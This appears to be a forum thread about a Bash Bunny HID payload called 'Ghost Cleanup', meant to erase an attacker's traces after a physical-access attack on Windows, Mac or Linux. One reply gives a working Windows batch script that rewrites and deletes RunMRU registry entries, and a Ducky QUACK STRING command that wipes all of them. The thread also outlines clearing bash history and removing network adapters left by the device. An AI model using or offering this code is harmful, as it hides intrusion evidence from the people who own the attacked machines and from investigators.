Jump to content

[Payload] Ghost Cleanup


Recommended Posts

[Payload] Ghost Cleanup


The goal of this payload is to provide a universal (WIn/Mac/Lin) HID script to clean up your tracks after an attack.  The idea is to have this as a switch 2 payload to easily execute after an attack.

Currently, I have code to:

  1. Select OS (Defaults to linux, but can be switched manually or with attack 1, by writing an appropriately named file to the BB loot folder)
  2. Ducky script from E2124 to open cmd/terminal
  3. Clear input history
    1. [mac/linux] Clear all bash history (or optioanlly set how many lines to remove from the end of ~./bash_history)
    2. [Win] use regedit to remove run commands
  4. [Win] Remove extra Ethernet adapters created by BB. (*WIP, looking at different methods)
  5. Comments providing guidance on where to insert your custom cleanup code for each platform

Please feel free for fork and contribute!

**  This script is a Work in Progress, as I'm still waiting on my BashBunny to arrive.

  • Upvote 1
Link to comment
Share on other sites

  • 2 weeks later...

Quick and Dirty Solution for Windows


@echo off
setlocal enableextensions enabledelayedexpansion

# Nr of lines deleting from Registry
set len=3
set /a len_pos=%len%-1

# Get the MRUList from Registry and save it to %mru%
for /f "tokens=2*" %%a in ('reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /v MRUList') do set "mru=%%b"
# Count chars
for /f %%c in ('cmd /u /v /q /c"(echo(!mru!)" ^| find /v "" ^| findstr /r /c:"[a-z]" ^| find /c /v ""') do set "str_len=%%c"

# Get the last Nr of defined lines from MRUList
set list=!mru:~0,%len%!
# Set the new MRUList
set original_list=!mru:~%len%,%str_len%!

# Delete old MRUList
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /v MRUList /f
# Add new MRUList
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /v MRUList /t Reg_Sz /d %original_list%

# Delete the last Nr of lines from Registry
for /l %%d in (0,1,%len_pos%) do (reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /v !list:~%%d,1! /f)



PS: You have to take the REG DELETE "Path" in double Quotes

QUACK STRING reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /va /f


Link to comment
Share on other sites


I've extracted my debug code to a simple helper with an OFF switch.

I'll eventually do a separate PR for this, but if anyone needs a simple debug helper it currently lives on my `develop` branch.



Edited by bg-wa
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Create New...